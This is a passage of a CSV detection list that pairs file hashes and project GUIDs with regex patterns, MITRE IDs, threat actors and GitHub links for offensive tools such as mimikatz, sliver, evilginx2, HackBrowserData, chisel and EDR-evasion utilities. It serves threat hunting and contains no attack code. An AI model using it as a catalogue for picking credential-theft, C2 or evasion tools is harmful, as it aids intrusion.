Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","28313" "*69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693*",".{0,1000}69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","28314" "*69ad04521e133db1e34347ec9a6ecb8ea3f90272c77ce2471c3145ac33fad13b*",".{0,1000}69ad04521e133db1e34347ec9a6ecb8ea3f90272c77ce2471c3145ac33fad13b.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","28315" "*69b9d25a8fa177bb4e35424dd0587162177938be90f50a41377f57356fe1a57d*",".{0,1000}69b9d25a8fa177bb4e35424dd0587162177938be90f50a41377f57356fe1a57d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28317" 
"*69c4271ef4f5bfe68fcd696c95af04c90f3340e5af9454294d9db58410f45ea6*",".{0,1000}69c4271ef4f5bfe68fcd696c95af04c90f3340e5af9454294d9db58410f45ea6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28321" "*69c8a35eb8a77c290766b74582cf485ffc73d81045f82df9805d4cd1c4934dfc*",".{0,1000}69c8a35eb8a77c290766b74582cf485ffc73d81045f82df9805d4cd1c4934dfc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28322" "*69d26456753b5aad2c91b4a6a5449a66f24554d51e777fe79d5db45c58345887*",".{0,1000}69d26456753b5aad2c91b4a6a5449a66f24554d51e777fe79d5db45c58345887.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28324" "*69d9dc8b265c039ff9a5677cbe5300fce13f17810d2dcc69a3705962adcb5015*",".{0,1000}69d9dc8b265c039ff9a5677cbe5300fce13f17810d2dcc69a3705962adcb5015.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28326" 
"*69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b*",".{0,1000}69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28327" "*69e1d22a36d6171f98da2f56fa5261813b99549f1cab882dd13c62b4abc40043*",".{0,1000}69e1d22a36d6171f98da2f56fa5261813b99549f1cab882dd13c62b4abc40043.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28328" "*69e92737993cca7f4757a5a3dc027b1f85ee6d836f18f6433332d9d269b9262f*",".{0,1000}69e92737993cca7f4757a5a3dc027b1f85ee6d836f18f6433332d9d269b9262f.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","28329" "*69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d*",".{0,1000}69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28331" 
"*69fae7c67545c79f70861ea4ec8b7244b555fd1898f6966e0698e1d4d4446081*",".{0,1000}69fae7c67545c79f70861ea4ec8b7244b555fd1898f6966e0698e1d4d4446081.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28332" "*69ff7f809ee0a683102bc50c9c7dc6b619945c0d5c774c577b52879f65ae9dc9*",".{0,1000}69ff7f809ee0a683102bc50c9c7dc6b619945c0d5c774c577b52879f65ae9dc9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28334" "*6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882*",".{0,1000}6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28335" "*6a0272c76fcec8ccada97a39b4d316eb9067b1dce499d297da7d9d02ab290c0a*",".{0,1000}6a0272c76fcec8ccada97a39b4d316eb9067b1dce499d297da7d9d02ab290c0a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - 
TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28336" "*6a0b2e5491caa977cc4efcea1a90b67480126b0d3148d1436add939bfbe785d5*",".{0,1000}6a0b2e5491caa977cc4efcea1a90b67480126b0d3148d1436add939bfbe785d5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28338" "*6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f*",".{0,1000}6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","#filehash","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","28339" "*6a1d85188bb481088fdd202dbb994910de83b05a2b49420faf1dc4a66143918b*",".{0,1000}6a1d85188bb481088fdd202dbb994910de83b05a2b49420faf1dc4a66143918b.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","28342" "*6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26*",".{0,1000}6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28343" "*6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6*",".{0,1000}6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28344" "*6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6*",".{0,1000}6a21863080045ef349eb105aa7e595c2a747b7c42e42756639b4591fea5058d6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28345" "*6a27858aee472da9a5faf7649801103ea6c0cad8d2b44baec2bffc563a0f7375*",".{0,1000}6a27858aee472da9a5faf7649801103ea6c0cad8d2b44baec2bffc563a0f7375.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28347" "*6A2BA6F7-3399-4890-9453-2D5BE8EEBBA9*",".{0,1000}6A2BA6F7\-3399\-4890\-9453\-2D5BE8EEBBA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28348" "*6a2c34b319067eea1310e221cff99ce5150be0a82a822fb280554974f6d60dd2*",".{0,1000}6a2c34b319067eea1310e221cff99ce5150be0a82a822fb280554974f6d60dd2.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","28349" "*6a31601415f4b02531aa031b1f246cec9f652f62927bc9b3c4443aac9c2ff625*",".{0,1000}6a31601415f4b02531aa031b1f246cec9f652f62927bc9b3c4443aac9c2ff625.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC 
bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","28350" "*6a39044b1dc482bfb03eca45d9c4b9874fb538a13f52c90a2ed64f91152d466c*",".{0,1000}6a39044b1dc482bfb03eca45d9c4b9874fb538a13f52c90a2ed64f91152d466c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28351" "*6A3F2F04-3E48-4E21-9AB8-0CA0998A2D01*",".{0,1000}6A3F2F04\-3E48\-4E21\-9AB8\-0CA0998A2D01.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28353" "*6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d*",".{0,1000}6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - 
Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28355" "*6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d*",".{0,1000}6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28356" "*6a4774242342d05732cabe098a56b1948d90f97fe72f464e347315b6d0e0becc*",".{0,1000}6a4774242342d05732cabe098a56b1948d90f97fe72f464e347315b6d0e0becc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - 
T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28358" "*6a48338880ea3ada4e5675edda95cfa57976ee18b6de9fbf6ab5ce545ee42ea8*",".{0,1000}6a48338880ea3ada4e5675edda95cfa57976ee18b6de9fbf6ab5ce545ee42ea8.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","28359" "*6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c*",".{0,1000}6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","28360" "*6a4fbed745f3af1684f1636445f56bf65f02db3926d0e4f8eef2661eaff9df9a*",".{0,1000}6a4fbed745f3af1684f1636445f56bf65f02db3926d0e4f8eef2661eaff9df9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28361" "*6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa*",".{0,1000}6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28362" "*6A5942A4-9086-408E-A9B4-05ABC34BFD58*",".{0,1000}6A5942A4\-9086\-408E\-A9B4\-05ABC34BFD58.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#GUIDproject","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","28363" "*6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751*",".{0,1000}6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","28364" "*6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751*",".{0,1000}6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","28365" "*6a7a023923c747c9a2b6c1664da1b04a45c0b978141d189794110ae3768f231f*",".{0,1000}6a7a023923c747c9a2b6c1664da1b04a45c0b978141d189794110ae3768f231f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28369" "*6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73*",".{0,1000}6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28370" "*6a88063e6945b8812f30c17209dc3eb3f3449d4ac0e5f80f0dbbee8d74889c0f*",".{0,1000}6a88063e6945b8812f30c17209dc3eb3f3449d4ac0e5f80f0dbbee8d74889c0f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28372" "*6a8d314ea62f3a61c0936755e82d928ce07e13a297b6ef02ad8821c235da8149*",".{0,1000}6a8d314ea62f3a61c0936755e82d928ce07e13a297b6ef02ad8821c235da8149.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28373" "*6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368*",".{0,1000}6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - 
Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28374" "*6a9a3b838e5547654d9b0d9024e2afcaa0ad721de33499d192684cda337d49f5*",".{0,1000}6a9a3b838e5547654d9b0d9024e2afcaa0ad721de33499d192684cda337d49f5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28376" "*6aa3276e8a8fafb17e99321fad558a22f628c82b1143227ffad08382dcb679ea*",".{0,1000}6aa3276e8a8fafb17e99321fad558a22f628c82b1143227ffad08382dcb679ea.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","28377" "*6aa39b4578eae70ad9e80df833b4633a5e78eda7b75b071d14f0a3befdf81223*",".{0,1000}6aa39b4578eae70ad9e80df833b4633a5e78eda7b75b071d14f0a3befdf81223.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","28378" "*6AA4E392-AAAF-4408-B550-85863DD4BAAF*",".{0,1000}6AA4E392\-AAAF\-4408\-B550\-85863DD4BAAF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28379" 
"*6AA4E392-AAAF-4408-B550-85863DF3BAAF*",".{0,1000}6AA4E392\-AAAF\-4408\-B550\-85863DF3BAAF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28380" "*6aa6e18ab15cb987dc3b2e46ed239f7ce5af2df55ace0f7878eddac6f5bee59e*",".{0,1000}6aa6e18ab15cb987dc3b2e46ed239f7ce5af2df55ace0f7878eddac6f5bee59e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28381" "*6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b*",".{0,1000}6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28382" "*6ab35eafc987bec331424733bd59804b320ce0801bcb96aa6fa854a23233d9a2*",".{0,1000}6ab35eafc987bec331424733bd59804b320ce0801bcb96aa6fa854a23233d9a2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 